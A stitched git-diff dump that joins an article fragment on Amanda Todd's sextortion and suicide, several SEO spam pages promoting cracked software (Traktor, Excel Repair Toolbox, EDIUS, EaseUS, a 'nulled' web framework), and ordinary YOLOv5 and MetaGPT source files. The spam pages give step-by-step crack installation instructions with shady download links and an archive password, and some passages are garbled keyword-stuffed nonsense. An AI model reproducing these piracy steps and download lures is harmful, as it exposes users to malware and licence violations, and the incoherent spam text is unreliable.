      In the video, Todd revealed that when she was in 7th grade, she used BlogTV to meet new people and received compliments on her looks. One day, she flashed her breasts on camera, thinking it was harmless. However, someone captured that moment and later contacted her on Facebook, threatening to send the image to her friends and family unless she performed more explicit acts on camera. When she refused, he followed through with his threat, causing her to be bullied and ostracized at school.

      -

      Todd moved to different schools several times, but the blackmailer always found her and repeated his demands. He also created a Facebook page with her nude photo as the profile picture, attracting more harassment from strangers. Todd fell into depression and anxiety, and started to self-harm and drink alcohol. She also attempted suicide several times, but survived.

      -

      In 2012, Todd uploaded her video on YouTube, hoping to raise awareness and find support. She also contacted the police and reported her blackmailer. However, it was too late. On October 10, 2012, she hanged herself at her home in Port Coquitlam, British Columbia.

      -

      Her death sparked outrage and sympathy around the world, and prompted calls for action against cyberbullying and online exploitation. The Canadian government proposed legislation to criminalize cyberbullying and make it easier to remove harmful online content. Todd's mother, Carol Todd, established the Amanda Todd Trust, a charity that supports anti-bullying education and programs for young people with mental health issues.

      -

      In 2014, a Dutch-Turkish man named Aydin Coban was arrested in the Netherlands for sexually blackmailing dozens of children online, including Todd. He was extradited to Canada in 2020 to face trial on charges of extortion, criminal harassment, communication with a young person to commit a sexual offence, and possession of child pornography. On August 5, 2022, he was found guilty on all counts by a jury in Vancouver. On October 14, 2022, he was sentenced to 13 years in prison.

      -

      -

      Coban denied any involvement in Todd's case and claimed he was framed by an unknown hacker. He also appealed his conviction and sentence. However, the evidence against him was overwhelming. He used multiple aliases and IP addresses to contact his victims and coerce them into performing sexual acts on camera. He also kept detailed records of his targets and their personal information. He showed no remorse or empathy for his actions.

      -

      Todd's case is a stark reminder of the dangers of the Internet and the need for vigilance and education. BlogTV may have shut down in 2013, but there are still many other sites and platforms that can be used for similar purposes by malicious actors. Teens should be aware of the risks of sharing personal or intimate information online, and seek help if they encounter any form of cyberbullying or blackmail. Parents should also monitor their children's online activities and communicate with them about their online safety.

      -

      Amanda Todd's story is not only a tragedy but also a legacy. She inspired millions of people to speak out against cyberbullying and support those who suffer from it. She also showed courage and resilience in the face of adversity. She may be gone, but she is not forgotten.

      e93f5a0c3f
      -
      -
      \ No newline at end of file diff --git a/spaces/stomexserde/gpt4-ui/Examples/Descargar Traktor Gratis Con __EXCLUSIVE__ Crack.md b/spaces/stomexserde/gpt4-ui/Examples/Descargar Traktor Gratis Con __EXCLUSIVE__ Crack.md deleted file mode 100644 index a3a58ab15546720d5f6c0b2f289bb5c845fd79d1..0000000000000000000000000000000000000000 --- a/spaces/stomexserde/gpt4-ui/Examples/Descargar Traktor Gratis Con __EXCLUSIVE__ Crack.md +++ /dev/null @@ -1,31 +0,0 @@ - -

      ¿Cómo Descargar Traktor Gratis Con Crack?

      -

      Traktor es un software profesional para mezclar música y crear tus propias pistas. Con Traktor puedes controlar hasta cuatro decks simultáneamente, aplicar efectos, loops, cues y mucho más. Traktor es compatible con la mayoría de los controladores DJ del mercado y te ofrece una experiencia de audio de alta calidad.

      -

      Descargar Traktor Gratis Con Crack


      Download File ○○○ https://urlgoal.com/2uI5N6



      -

      Si quieres descargar Traktor gratis con crack, estás en el lugar correcto. En este artículo te vamos a mostrar cómo puedes obtener la última versión de Traktor Pro 3.8 full, con todas las funciones y características disponibles. Además, te explicaremos cómo instalarlo y activarlo correctamente en tu ordenador.

      -

      Pasos para descargar Traktor gratis con crack

      -

      Para descargar Traktor gratis con crack, solo tienes que seguir estos sencillos pasos:

      -
        -
      1. Entra en el sitio web de AW Descargas, donde encontrarás el enlace de descarga de Traktor Pro 3.8 full.
      2. -
      3. Haz clic en el botón de descarga y espera a que se complete el proceso. El archivo que se descargará es un archivo comprimido en formato ZIP.
      4. -
      5. Extrae el contenido del archivo ZIP en una carpeta de tu preferencia. Dentro encontrarás el instalador de Traktor Pro 3.8 y el archivo de crack.
      6. -
      7. Ejecuta el instalador de Traktor Pro 3.8 y sigue las instrucciones que aparecen en pantalla. Acepta los términos y condiciones y elige la ruta de instalación.
      8. -
      9. Cuando termine la instalación, no abras el programa todavía. Copia el archivo de crack y pégalo en la carpeta donde se instaló Traktor Pro 3.8. Reemplaza el archivo original si te lo pide.
      10. -
      11. Ya puedes abrir Traktor Pro 3.8 y disfrutar de todas sus funciones y características. Recuerda que debes tener una conexión a internet activa para que el programa se pueda activar correctamente.
      12. -
      -

      Beneficios de descargar Traktor gratis con crack

      -

      Al descargar Traktor gratis con crack, podrás acceder a los siguientes beneficios:

      -
        -
      • Tendrás la versión más reciente y actualizada de Traktor Pro 3.8, con todas las novedades y mejoras que ofrece.
      • -
      • No tendrás que pagar nada por el software, ni tampoco por las actualizaciones futuras.
      • -
      • Podrás usar Traktor Pro 3.8 sin ninguna limitación ni restricción, tanto en modo online como offline.
      • -
      • Podrás crear tus propias mezclas y pistas con una calidad profesional, usando los mejores efectos, loops, cues y más.
      • -
      • Podrás conectar tu controlador DJ favorito y aprovechar al máximo las funciones de Traktor Pro 3.8.
      • -
      -

      Conclusión

      -

      Traktor es uno de los mejores programas para DJ que existen en el mercado. Con Traktor puedes mezclar música como un profesional, usando hasta cuatro decks al mismo tiempo, aplicando efectos, loops, cues y más. Además, Traktor es compatible con la mayoría de los controladores DJ del mercado y te ofrece una calidad de sonido excepcional.

      -

      Si quieres descargar Traktor gratis con crack, solo tienes que seguir los pasos que te hemos mostrado en este artículo. Así podrás obtener la última versión de Traktor Pro 3.8 full, con todas las funciones y características disponibles. Además, te hemos explicado cómo instalarlo y activarlo correctamente en tu ordenador.

      -

      -

      No esperes más y descarga Traktor gratis con crack hoy mismo. Verás cómo tu experiencia como DJ mejora notablemente con este software. Y si te ha gustado este artículo, compártelo

      81aa517590
      -
      -
      \ No newline at end of file diff --git a/spaces/stomexserde/gpt4-ui/Examples/Excel Repair Toolbox 3.0.15.0 Crack ((INSTALL)).md b/spaces/stomexserde/gpt4-ui/Examples/Excel Repair Toolbox 3.0.15.0 Crack ((INSTALL)).md deleted file mode 100644 index aae869f334f83afecf28b36c4a88045ed7d98236..0000000000000000000000000000000000000000 --- a/spaces/stomexserde/gpt4-ui/Examples/Excel Repair Toolbox 3.0.15.0 Crack ((INSTALL)).md +++ /dev/null @@ -1,40 +0,0 @@ -
      -Here is a possible title and article with html formatting for the keyword "excel repair toolbox 3.0.15.0 crack": - -

      How to Download and Use Excel Repair Toolbox 3.0.15.0 Crack

      -

      If you are looking for a way to fix your corrupted or damaged Excel files, you might have come across Excel Repair Toolbox 3.0.15.0 Crack. This is a cracked version of a popular Excel repair software that claims to recover your data from any Excel file format. But is it safe and reliable to use? In this article, we will tell you everything you need to know about Excel Repair Toolbox 3.0.15.0 Crack and how to use it.

      -

      What is Excel Repair Toolbox 3.0.15.0 Crack?

      -

      Excel Repair Toolbox 3.0.15.0 Crack is a modified version of the original Excel Repair Toolbox software that is available for free download from various sources on the internet. The crack version bypasses the license key verification and allows you to use the full features of the software without paying for it.

      -

      excel repair toolbox 3.0.15.0 crack


      Download Filehttps://urlgoal.com/2uIaY3



      -

      Excel Repair Toolbox is a software that can repair corrupted or damaged Excel files in various scenarios, such as virus attack, power failure, improper shutdown, file system error, etc. It can recover data from xls, xlsx, xlsm, xltm, xlam, and other Excel file formats. It can also restore formulas, formats, charts, images, and other elements in your Excel files.

      -

      How to Download and Use Excel Repair Toolbox 3.0.15.0 Crack?

      -

      To download and use Excel Repair Toolbox 3.0.15.0 Crack, you need to follow these steps:

      -
        -
      1. Go to one of the websites that offer the crack download link, such as HaxPC, iMyFone, or TealFeed.
      2. -
      3. Click on the download button and save the zip file on your computer.
      4. -
      5. Extract the zip file using a password (usually www.free-4paid.com) and run the setup file to install the software.
      6. -
      7. Do not launch the software after installation. Instead, copy and paste the crack files from the zip file into the installation folder (usually C:/Program Files/Excel Repair Toolbox).
      8. -
      9. Launch the software and enjoy its full features.
      10. -
      -

      Is Excel Repair Toolbox 3.0.15.0 Crack Safe and Reliable?

      -

      While Excel Repair Toolbox 3.0.15.0 Crack may seem tempting to use, it is not safe and reliable for several reasons:

      -
        -
      • The crack version may contain viruses, malware, spyware, or other harmful programs that can damage your computer or steal your personal information.
      • -
      • The crack version may not work properly or cause further damage to your Excel files.
      • -
      • The crack version may violate the intellectual property rights of the original software developer and expose you to legal risks.
      • -
      • The crack version may not be compatible with the latest updates or versions of Excel or Windows.
      • -
      • The crack version may not provide any technical support or customer service in case of any issues.
      • -
      -

      Therefore, we do not recommend using Excel Repair Toolbox 3.0.15.0 Crack or any other cracked software for repairing your Excel files.

      -

      A Better Alternative to Excel Repair Toolbox 3.0.15.0 Crack

      -

      If you are looking for a better alternative to Excel Repair Toolbox 3.0.15.0 Crack, we suggest you try Wondershare Repairit - File Repair.

      -

      Wondershare Repairit is a professional and reliable software that can fix all kinds of corrupted or damaged Excel files with ease.

      -

      -

      Some of its features are:

      -
        -
      • It supports repairing xls, xlsx, xlsm, xltm, xlam, and other Excel file formats.
      • -
      • It can recover data from multiple sheets in one go.
      • -
      • It can restore formulas, formats, charts, images, and other elements in your Excel files.
      • -
      • It can repair Excel files

        7196e7f11a
        -
        -
        \ No newline at end of file diff --git a/spaces/stomexserde/gpt4-ui/Examples/Fzdhtjw--Gb1-0 Font !EXCLUSIVE!.md b/spaces/stomexserde/gpt4-ui/Examples/Fzdhtjw--Gb1-0 Font !EXCLUSIVE!.md deleted file mode 100644 index 2ba41e6533fc8cfc822bae6b7904f49265f246a4..0000000000000000000000000000000000000000 --- a/spaces/stomexserde/gpt4-ui/Examples/Fzdhtjw--Gb1-0 Font !EXCLUSIVE!.md +++ /dev/null @@ -1,12 +0,0 @@ - -

        Fzdhtjw--Gb1-0 Font: A Free Chinese Font from Founder Type

        -

        Fzdhtjw--Gb1-0 Font is a free Chinese font that belongs to the Heiti (黑体) category, which means it is a sans-serif typeface with bold and uniform strokes. The font is also known as 方正大黑简体 (Fangzheng Dahei Jianti) in Chinese, which means Founder Type Big Black Simplified. The font was created by Founder Type, one of the largest and most influential font foundries in China.

        -

        Fzdhtjw--Gb1-0 Font


        Download Zip 🌟 https://urlgoal.com/2uIc7L



        -

        The font has a regular style and a file size of 2.21 MB. It supports the GB 2312-80 character set, which covers 7,445 Chinese characters and some symbols. The font has a high legibility and readability, making it suitable for headlines, posters, logos, and other large-scale applications. The font also has a modern and stylish appearance, giving it a sense of professionalism and elegance.

        -

        The font is free for personal use only. For commercial use, you need to contact the copyright owner or FontGoods, a licensed website of genuine commercial fonts. You can download the font from the official website of Founder Type or from other online sources such as FontKe.com or OnlineWebFonts.com[^1^] [^2^] [^3^]. To install the font on your computer, you need to unzip the downloaded file and copy the .ttf file to your fonts folder.

        -

        If you are looking for a free Chinese font that has a bold and sleek design, Fzdhtjw--Gb1-0 Font might be a good choice for you. It is one of the many high-quality fonts that Founder Type offers to the public. You can try it out and see how it looks on your projects.

        Heiti fonts are a type of Chinese fonts that are derived from the Gothic style of Japanese fonts. They are characterized by their straight and uniform strokes, without any serifs or variations in thickness. Heiti fonts are similar to sans-serif fonts in Latin alphabets, and they are often used for modern and minimalist designs. Heiti fonts are also suitable for digital media, as they have a clear and crisp appearance on screens.

        -

        -

        There are many Heiti fonts available online, both free and paid. Some of the most popular and reputable Heiti fonts are from Adobe and Arphic, two leading font foundries that specialize in Asian languages. Adobe Heiti[^1^] is a font family that consists of one regular style, with support for Simplified Chinese, Traditional Chinese, Japanese, Korean, and Latin characters. It has a balanced and harmonious design, with a moderate contrast and a large x-height. Adobe Heiti is part of the Adobe Originals program, which aims to create original and high-quality fonts for various purposes.

        -

        Arphic Heiti[^3^] is another font family that offers multiple styles and weights, ranging from light to heavy. It supports Big Five (Traditional Chinese), GB 2312 (Simplified Chinese), JIS X 0208 (Japanese), and KS X 1001 (Korean) character sets, as well as Latin characters. It has a dynamic and expressive design, with a slight slant and a high contrast. Arphic Heiti is suitable for headlines, logos, posters, and other eye-catching applications.

        7196e7f11a
        -
        -
        \ No newline at end of file diff --git a/spaces/stomexserde/gpt4-ui/Examples/GrassValley EDIUS Pro 7.4.1.28 WiN64 TOP.md b/spaces/stomexserde/gpt4-ui/Examples/GrassValley EDIUS Pro 7.4.1.28 WiN64 TOP.md deleted file mode 100644 index 683498776539d901c39f5bd4cb7e1d2e73170b39..0000000000000000000000000000000000000000 --- a/spaces/stomexserde/gpt4-ui/Examples/GrassValley EDIUS Pro 7.4.1.28 WiN64 TOP.md +++ /dev/null @@ -1,81 +0,0 @@ - -

        GrassValley EDIUS Pro 7.4.1.28 WiN64: A Review

        -

        If you are looking for a fast and versatile video editing software that can handle any format and resolution, you might want to check out GrassValley EDIUS Pro 7.4.1.28 WiN64. This is the latest version of the popular editing software from Grass Valley, a company that has been in the industry for over 60 years.

        -

        GrassValley EDIUS Pro 7.4.1.28 WiN64


        Downloadhttps://urlgoal.com/2uI9ve



        -

        In this article, we will review GrassValley EDIUS Pro 7.4.1.28 WiN64 and see what it can do for you as a video editor. We will cover its features and benefits, system requirements, installation and activation process, reasons to choose it over other editing software, how to use it for basic and advanced editing, and some tips and tricks to make your editing experience smoother and more efficient.

        -

        By the end of this article, you will have a clear idea of whether GrassValley EDIUS Pro 7.4.1.28 WiN64 is the right editing software for you or not.

        -

        What is GrassValley EDIUS Pro 7?

        -

        GrassValley EDIUS Pro 7 is a professional video editing software that allows you to edit anything, anywhere. It is designed for broadcast news, newsmagazine content, studio programs, corporate, documentary, and 4K theatrical productions.

        -

        -

        GrassValley EDIUS Pro 7 is the perfect finishing tool for your video projects, as it can handle any format from 24x24 to 4Kx2K, all on the same timeline, even in nested sequences, all in real time.

        -

        Features and Benefits

        -

        Some of the features and benefits of GrassValley EDIUS Pro 7 are:

        -
          -
        • It has no limitations to the number of audio, video, graphics, and title tracks.
        • -
        • It supports 4K, 3D, HD, SD, and almost any format you can think of.
        • -

          System Requirements

          -

          To run GrassValley EDIUS Pro 7.4.1.28 WiN64, you will need the following system requirements:

          - - - - - - - - - - - - - - - - - - - -
          OSCPURAMHDDGraphics CardSound CardOptical Drive
          Windows 7 64-bit (Service Pack 1 or later), Windows 8/8.1 64-bitAny Intel Core 2 or Core iX CPU. Intel or AMD single core CPU with a 3 GHz processor speed or faster (multiple CPUs and/or multicore CPUs are recommended). SSSE3 (Supplementary SSE3) instruction set support required.1 GB RAM minimum (4 GB or more recommended)6 GB of hard disk space is required for installation (including third-party software). Drive with SATA/7,200 RPM or faster is required for video storage.Supporting higher resolution than 1024x768 32-bit. Direct3D 9.0c or later and PixelShader Model 3.0 or later is required. Requirements for video memory size when using GPUfx will vary depending on the project format. For 10-bit SD projects: 1 GB or more recommended, for HD/4K projects 2 GB or more recommended.Sound card with WDM driver support is required.Blu-ray Disc writer is required when creating Blu-ray Discs.
          -

          Note: External video decks/cameras may require a USB 2.0 port for connectivity.

          -

          How to Install and Activate GrassValley EDIUS Pro 7.4.1.28 WiN64

          -

          To install and activate GrassValley EDIUS Pro 7.4.1.28 WiN64, you will need to follow these steps:

          -
            -
          1. Download the setup file from the official website or from a trusted source.
          2. -
          3. Run the setup file and follow the instructions on the screen.
          4. -
          5. When prompted, enter the serial number that you received when you purchased the software.
          6. -
          7. After the installation is complete, launch the software and click on the "Register" button.
          8. -
          9. You will be redirected to the online registration page, where you will need to fill in your personal information and product details.
          10. -
          11. You will receive an email with a confirmation link. Click on the link to complete the registration process.
          12. -
          13. You will also receive an email with an activation code. Copy and paste the code into the software and click on the "Activate" button.
          14. -
          15. You have successfully installed and activated GrassValley EDIUS Pro 7.4.1.28 WiN64.
          16. -
          -

          Note: You can also activate the software offline by contacting Grass Valley support.

          -

          Why Choose GrassValley EDIUS Pro 7?

          -

          There are many reasons why you should choose GrassValley EDIUS Pro 7 as your video editing software. Here are some of them:

          -

          Fast and Versatile Editing Software

          -

          GrassValley EDIUS Pro 7 is one of the fastest and most versatile editing software in the market. It can handle any format and resolution, from SD to HD to 4K, without any rendering or transcoding. It can also edit in real time, even with multiple layers of effects, transitions, and filters.

          -

          GrassValley EDIUS Pro 7 also has a user-friendly interface that allows you to customize your workspace according to your preferences and workflow. You can use keyboard shortcuts, drag-and-drop editing, timeline markers, ripple mode, sync mode, multicam editing, and more to speed up your editing process.

          -

          Support for Multiple Formats and Resolutions

          -

          Open to Third-Party Hardware and Software

          -

          GrassValley EDIUS Pro 7 is not only compatible with Grass Valley hardware, but also with third-party hardware and software. You can use it with Blackmagic Design, Matrox, and AJA video cards, as well as with external monitors and recorders. You can also use it with plug-ins and filters from companies such as NewBlueFX, Boris FX, proDAD, iZotope, and more.

          -

          GrassValley EDIUS Pro 7 also supports the EDL or AAF import/export function, which allows you to exchange projects with other editing software such as Adobe Premiere Pro, Avid Media Composer, Apple Final Cut Pro, and DaVinci Resolve.

          -

          Low-Resolution Proxy Editing Mode

          -

          If you are working with high-resolution footage, such as 4K or 3D, you might encounter some performance issues on your computer. To solve this problem, GrassValley EDIUS Pro 7 offers a low-resolution proxy editing mode, which allows you to edit with smaller and lighter files that are automatically linked to the original high-resolution files.

          -

          This way, you can edit faster and smoother, without compromising the quality of your final output. You can also switch between the proxy mode and the normal mode at any time, depending on your needs and preferences.

          -

          Real-Time Video Transcoding Technology

          -

          Another feature that makes GrassValley EDIUS Pro 7 stand out from other editing software is its real-time video transcoding technology. This technology allows you to convert between different formats and resolutions on the fly, without any rendering or waiting time.

          -

          For example, you can convert 4K footage to HD or SD footage in real time, or vice versa. You can also convert between different frame rates, such as 24p to 60p or 50p to 25p. You can even convert between different aspect ratios, such as 16:9 to 4:3 or 2.35:1 to 1.85:1.

          -

          This feature is very useful when you need to deliver your video projects in different formats and resolutions for different platforms and devices.

          -

          How to Use GrassValley EDIUS Pro 7?

          -

          Now that you know what GrassValley EDIUS Pro 7 can do for you, let's see how you can use it for your video editing projects. We will cover the basic editing workflow, some advanced editing techniques, and some tips and tricks to make your editing experience easier and more enjoyable.

          -

          Basic Editing Workflow

          -

          The basic editing workflow of GrassValley EDIUS Pro 7 consists of the following steps:

          -
            -
          1. Import your media files into the software. You can use the source browser to browse and preview your files from various sources, such as cameras, memory cards, hard drives, optical discs, etc. You can also use the capture tool to capture video from tape-based devices.
          2. -
          3. Create a new project and set up your project settings. You can choose your project format, frame rate, aspect ratio, audio settings, etc. You can also create custom presets for your project settings.
          4. -
          5. Add your media files to the bin window. You can organize your files into folders and subfolders for easy access. You can also add metadata and comments to your files for better identification.
          6. -
          7. Add your media files to the timeline window. You can drag and drop your files from the bin window to the timeline window. You can also use the insert or overwrite buttons to add your files to the timeline.
          8. -
          9. Q: Where can I download GrassValley EDIUS Pro 7.4.1.28 WiN64?
            A: You can download GrassValley EDIUS Pro 7.4.1.28 WiN64 from the official website or from a trusted source. You will need a serial number to activate the software.
          10. -
          -

          I hope you enjoyed this article and learned something new about GrassValley EDIUS Pro 7.4.1.28 WiN64. If you have any questions or comments, feel free to leave them below. Thank you for reading and happy editing!

          b2dd77e56b
          -
          -
          \ No newline at end of file diff --git a/spaces/stratussox/yolov5_inference/hubconf.py b/spaces/stratussox/yolov5_inference/hubconf.py deleted file mode 100644 index 41af8e39d14deba8679400d02c192696bcf37544..0000000000000000000000000000000000000000 --- a/spaces/stratussox/yolov5_inference/hubconf.py +++ /dev/null @@ -1,169 +0,0 @@ -# YOLOv5 🚀 by Ultralytics, GPL-3.0 license -""" -PyTorch Hub models https://pytorch.org/hub/ultralytics_yolov5 - -Usage: - import torch - model = torch.hub.load('ultralytics/yolov5', 'yolov5s') # official model - model = torch.hub.load('ultralytics/yolov5:master', 'yolov5s') # from branch - model = torch.hub.load('ultralytics/yolov5', 'custom', 'yolov5s.pt') # custom/local model - model = torch.hub.load('.', 'custom', 'yolov5s.pt', source='local') # local repo -""" - -import torch - - -def _create(name, pretrained=True, channels=3, classes=80, autoshape=True, verbose=True, device=None): - """Creates or loads a YOLOv5 model - - Arguments: - name (str): model name 'yolov5s' or path 'path/to/best.pt' - pretrained (bool): load pretrained weights into the model - channels (int): number of input channels - classes (int): number of model classes - autoshape (bool): apply YOLOv5 .autoshape() wrapper to model - verbose (bool): print all information to screen - device (str, torch.device, None): device to use for model parameters - - Returns: - YOLOv5 model - """ - from pathlib import Path - - from models.common import AutoShape, DetectMultiBackend - from models.experimental import attempt_load - from models.yolo import ClassificationModel, DetectionModel, SegmentationModel - from utils.downloads import attempt_download - from utils.general import LOGGER, check_requirements, intersect_dicts, logging - from utils.torch_utils import select_device - - if not verbose: - LOGGER.setLevel(logging.WARNING) - check_requirements(exclude=('opencv-python', 'tensorboard', 'thop')) - name = Path(name) - path = name.with_suffix('.pt') if name.suffix == '' and not name.is_dir() else name # checkpoint path - try: - device = select_device(device) - if pretrained and channels == 3 and classes == 80: - try: - model = DetectMultiBackend(path, device=device, fuse=autoshape) # detection model - if autoshape: - if model.pt and isinstance(model.model, ClassificationModel): - LOGGER.warning('WARNING ⚠️ YOLOv5 ClassificationModel is not yet AutoShape compatible. ' - 'You must pass torch tensors in BCHW to this model, i.e. shape(1,3,224,224).') - elif model.pt and isinstance(model.model, SegmentationModel): - LOGGER.warning('WARNING ⚠️ YOLOv5 SegmentationModel is not yet AutoShape compatible. ' - 'You will not be able to run inference with this model.') - else: - model = AutoShape(model) # for file/URI/PIL/cv2/np inputs and NMS - except Exception: - model = attempt_load(path, device=device, fuse=False) # arbitrary model - else: - cfg = list((Path(__file__).parent / 'models').rglob(f'{path.stem}.yaml'))[0] # model.yaml path - model = DetectionModel(cfg, channels, classes) # create model - if pretrained: - ckpt = torch.load(attempt_download(path), map_location=device) # load - csd = ckpt['model'].float().state_dict() # checkpoint state_dict as FP32 - csd = intersect_dicts(csd, model.state_dict(), exclude=['anchors']) # intersect - model.load_state_dict(csd, strict=False) # load - if len(ckpt['model'].names) == classes: - model.names = ckpt['model'].names # set class names attribute - if not verbose: - LOGGER.setLevel(logging.INFO) # reset to default - return model.to(device) - - except Exception as e: - help_url = 'https://github.com/ultralytics/yolov5/issues/36' - s = f'{e}. Cache may be out of date, try `force_reload=True` or see {help_url} for help.' - raise Exception(s) from e - - -def custom(path='path/to/model.pt', autoshape=True, _verbose=True, device=None): - # YOLOv5 custom or local model - return _create(path, autoshape=autoshape, verbose=_verbose, device=device) - - -def yolov5n(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-nano model https://github.com/ultralytics/yolov5 - return _create('yolov5n', pretrained, channels, classes, autoshape, _verbose, device) - - -def yolov5s(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-small model https://github.com/ultralytics/yolov5 - return _create('yolov5s', pretrained, channels, classes, autoshape, _verbose, device) - - -def yolov5m(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-medium model https://github.com/ultralytics/yolov5 - return _create('yolov5m', pretrained, channels, classes, autoshape, _verbose, device) - - -def yolov5l(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-large model https://github.com/ultralytics/yolov5 - return _create('yolov5l', pretrained, channels, classes, autoshape, _verbose, device) - - -def yolov5x(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-xlarge model https://github.com/ultralytics/yolov5 - return _create('yolov5x', pretrained, channels, classes, autoshape, _verbose, device) - - -def yolov5n6(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-nano-P6 model https://github.com/ultralytics/yolov5 - return _create('yolov5n6', pretrained, channels, classes, autoshape, _verbose, device) - - -def yolov5s6(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-small-P6 model https://github.com/ultralytics/yolov5 - return _create('yolov5s6', pretrained, channels, classes, autoshape, _verbose, device) - - -def yolov5m6(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-medium-P6 model https://github.com/ultralytics/yolov5 - return _create('yolov5m6', pretrained, channels, classes, autoshape, _verbose, device) - - -def yolov5l6(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-large-P6 model https://github.com/ultralytics/yolov5 - return _create('yolov5l6', pretrained, channels, classes, autoshape, _verbose, device) - - -def yolov5x6(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-xlarge-P6 model https://github.com/ultralytics/yolov5 - return _create('yolov5x6', pretrained, channels, classes, autoshape, _verbose, device) - - -if __name__ == '__main__': - import argparse - from pathlib import Path - - import numpy as np - from PIL import Image - - from utils.general import cv2, print_args - - # Argparser - parser = argparse.ArgumentParser() - parser.add_argument('--model', type=str, default='yolov5s', help='model name') - opt = parser.parse_args() - print_args(vars(opt)) - - # Model - model = _create(name=opt.model, pretrained=True, channels=3, classes=80, autoshape=True, verbose=True) - # model = custom(path='path/to/model.pt') # custom - - # Images - imgs = [ - 'data/images/zidane.jpg', # filename - Path('data/images/zidane.jpg'), # Path - 'https://ultralytics.com/images/zidane.jpg', # URI - cv2.imread('data/images/bus.jpg')[:, :, ::-1], # OpenCV - Image.open('data/images/bus.jpg'), # PIL - np.zeros((320, 640, 3))] # numpy - - # Inference - results = model(imgs, size=320) # batched inference - - # Results - results.print() - results.save() diff --git a/spaces/sub314xxl/MetaGPT/metagpt/manager.py b/spaces/sub314xxl/MetaGPT/metagpt/manager.py deleted file mode 100644 index 9d238c6215b9fedce19a76d268c7d54063a6c224..0000000000000000000000000000000000000000 --- a/spaces/sub314xxl/MetaGPT/metagpt/manager.py +++ /dev/null @@ -1,66 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- -""" -@Time : 2023/5/11 14:42 -@Author : alexanderwu -@File : manager.py -""" -from metagpt.llm import LLM -from metagpt.logs import logger -from metagpt.schema import Message - - -class Manager: - def __init__(self, llm: LLM = LLM()): - self.llm = llm # Large Language Model - self.role_directions = { - "BOSS": "Product Manager", - "Product Manager": "Architect", - "Architect": "Engineer", - "Engineer": "QA Engineer", - "QA Engineer": "Product Manager" - } - self.prompt_template = """ - Given the following message: - {message} - - And the current status of roles: - {roles} - - Which role should handle this message? - """ - - async def handle(self, message: Message, environment): - """ - 管理员处理信息,现在简单的将信息递交给下一个人 - The administrator processes the information, now simply passes the information on to the next person - :param message: - :param environment: - :return: - """ - # Get all roles from the environment - roles = environment.get_roles() - # logger.debug(f"{roles=}, {message=}") - - # Build a context for the LLM to understand the situation - # context = { - # "message": str(message), - # "roles": {role.name: role.get_info() for role in roles}, - # } - # Ask the LLM to decide which role should handle the message - # chosen_role_name = self.llm.ask(self.prompt_template.format(context)) - - # FIXME: 现在通过简单的字典决定流向,但之后还是应该有思考过程 - #The direction of flow is now determined by a simple dictionary, but there should still be a thought process afterwards - next_role_profile = self.role_directions[message.role] - # logger.debug(f"{next_role_profile}") - for _, role in roles.items(): - if next_role_profile == role.profile: - next_role = role - break - else: - logger.error(f"No available role can handle message: {message}.") - return - - # Find the chosen role and handle the message - return await next_role.handle(message) diff --git a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Designmodo Startup Framework Nulled Cracking High Quality.md b/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Designmodo Startup Framework Nulled Cracking High Quality.md deleted file mode 100644 index 3b1a731aa7d242e5b15a418188edaefbb74e5cbe..0000000000000000000000000000000000000000 --- a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Designmodo Startup Framework Nulled Cracking High Quality.md +++ /dev/null @@ -1,10 +0,0 @@ -
          -

          we need your support to keep this project alive. we are in the process of building a cloud platform for startups around the globe. we are using this as a beta, and we want you to help us test it and make it better.

          -

          the extensive range of problems include real world issues, coding challenges, code tests, and mock interviews. s. we are huge fans of google mock, we're here to help you. easily convert between markup and code files with the help of a dialog. designmodo startup framework nulled. startups designmodo startup framework nulled. you can see how the program works by following the step by step tutorial and writing your own code. at the end of the day, any client will tell you that they want a fast site, in order to keep their business.

          -

          Designmodo Startup Framework Nulled Cracking


          DOWNLOAD ✒ ✒ ✒ https://cinurl.com/2uEXrH



          -

          designmodo startup framework nulled cracking. how to crack a j. that's why, each time a new request is made, it's taken into the queue and processed one by one. all files are available for free to download as zip, rar, torrent, keygen, warez full version for windows.

          -

          the small business owner is not interested in spending a few hours to put together a website, they are interested in getting the product or service delivered. designmodo startup framework nulled - enter your email address to subscribe to this blog and receive notifications of new posts by email.

          -

          even after the upgrade the platform was still very usable. when i ask some of the people who are starting a new site what they are using, i am seeing more and more of them preferring this framework as an alternative to other cms systems.

          -

          this is a 3d model of a game character. the pack contains 200 additional animations and 1. the pack can be used as a starting point for your own designs. crack-designmodo-startup-framework-nulled-io - designmodo startup framework nulled io logos 5 torrent download set.a.light 3d studio full crack software

          899543212b
          -
          -
          \ No newline at end of file diff --git a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/EaseUS Data Recovery Crack Download Full Version __LINK__.md b/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/EaseUS Data Recovery Crack Download Full Version __LINK__.md deleted file mode 100644 index 113da98305e23e2848b6f78bf4857a4804cc97ec..0000000000000000000000000000000000000000 --- a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/EaseUS Data Recovery Crack Download Full Version __LINK__.md +++ /dev/null @@ -1,9 +0,0 @@ -
          -

          with easeus data recovery crack you can recover your lost data easily. the software is an intuitive data recovery tool and doesn’t require any technical skills or expertise to recover lost data. in this software, you can recover any type of data from any storage device. the software also helps you to recover data even if you have accidentally deleted it. the software also allows you to recover data from windows operating system. this software lets you to recover deleted files, folders, and partitions.

          -

          EaseUS Data Recovery Crack Download Full Version


          Download Filehttps://cinurl.com/2uEY7G



          -

